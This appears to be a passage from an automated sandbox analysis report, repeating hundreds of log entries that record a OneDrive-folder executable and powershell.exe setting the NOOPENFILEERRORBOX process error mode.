                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
